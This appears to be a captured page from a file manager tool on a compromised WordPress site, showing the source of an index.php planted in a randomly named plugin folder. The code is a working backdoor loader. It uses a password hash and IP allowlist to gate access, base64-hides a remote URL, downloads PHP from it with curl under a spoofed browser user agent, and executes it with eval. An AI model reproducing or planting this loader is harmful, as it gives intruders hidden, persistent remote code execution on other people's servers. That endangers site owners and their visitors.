📁 File Manager Pro
v10.0.3 | PHP: 8.1.34
Server: LiteSpeed
2026-06-28 20:00:19
📂
/ (Root)
/
home
/
apkbfjox
/
shamapk.com
/
wp-content
/
plugins
/
wp-plugin-8q299udx6t
/
mm
/
mmd
📍 /home/apkbfjox/shamapk.com/wp-content/plugins/wp-plugin-8q299udx6t/mm/mmd
🔄 Refresh
✏️
Editing: index.php
Writable
<?php session_start(); $PASSWORD_HASH = '$2b$12$byplUQfjYlZhtzw0ewmQIeYexf6yMU8/lUYCIOp9AgKZwS9stIrEi'; $SESSION_MINUTES = 60; $IP_ALLOWLIST = ['141.140.0.0/16']; $now = time(); $ttl = $SESSION_MINUTES * 60; function ip_in_cidr($ip, $cidr) { if (strpos($cidr, '/') === false) { return $ip === $cidr; } list($subnet, $bits) = explode('/', $cidr, 2); $bits = (int)$bits; $ipL = ip2long($ip); $sbL = ip2long($subnet); if ($ipL === false || $sbL === false) { return false; } if ($bits < 0 || $bits > 32) { return false; } if ($bits === 0) { return true; } $mask = -1 << (32 - $bits); return ($ipL & $mask) === ($sbL & $mask); } $clientIp = $_SERVER['REMOTE_ADDR'] ?? ''; $ipTrusted = false; foreach ($IP_ALLOWLIST as $cidr) { if (ip_in_cidr($clientIp, $cidr)) { $ipTrusted = true; break; } } if (isset($_GET['logout'])) { session_unset(); session_destroy(); header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?')); exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { if (password_verify($_POST['password'], $PASSWORD_HASH)) { session_regenerate_id(true); $_SESSION['auth'] = true; $_SESSION['expires'] = $now + $ttl; } else { $error = 'Wrong password.'; sleep(1); } } $authed = $ipTrusted || (!empty($_SESSION['auth']) && !empty($_SESSION['expires']) && $_SESSION['expires'] > $now); if (!$authed) { if (!empty($_SESSION['auth'])) { session_unset(); session_destroy(); $error = isset($error) ? $error : 'Session expired. Please log in again.'; } ?> <!doctype html> <html><head><meta charset="utf-8"><title>Login</title> <style> body{font-family:sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;background:#111;color:#eee;margin:0} form{background:#222;padding:24px;border-radius:8px;min-width:280px} input{width:100%;padding:10px;margin:8px 0;border:1px solid #444;background:#111;color:#eee;border-radius:4px;box-sizing:border-box} button{width:100%;padding:10px;background:#0a84ff;color:#fff;border:0;border-radius:4px;cursor:pointer} .err{color:#ff6b6b;font-size:14px;margin-bottom:8px} </style></head> <body> <form method="post"> <h3>Authentication Required</h3> <?php if (!empty($error)) echo '<div class="err">' . htmlspecialchars($error) . '</div>'; ?> <input type="password" name="password" placeholder="Password" autofocus required> <button type="submit">Unlock</button> </form> </body></html> <?php exit; } if (!empty($_SESSION['auth'])) { $_SESSION['expires'] = $now + $ttl; } $remoteUrl = base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3phaGlkZWthcmF5aWxhbjkzOC1ib3QvZnJlc2gvcmVmcy9oZWFkcy9tYWluL2Jlc3QucGhw"); $ch = curl_init($remoteUrl); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_SSL_VERIFYHOST => 2, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', CURLOPT_TIMEOUT => 20, ]); $remoteCode = curl_exec($ch); $status = curl_getinfo($ch, CURLINFO_HTTP_CODE); $err = curl_errno($ch) ? curl_error($ch) : null; curl_close($ch); if ($err) { die('cURL Error: ' . htmlspecialchars($err)); } if ($status !== 200) { die('Remote fetch failed. Status: ' . (int)$status); } if (empty($remoteCode)){ die('Remote file is empty.'); } eval('?>' . $remoteCode);
💾 Save Changes
❌ Cancel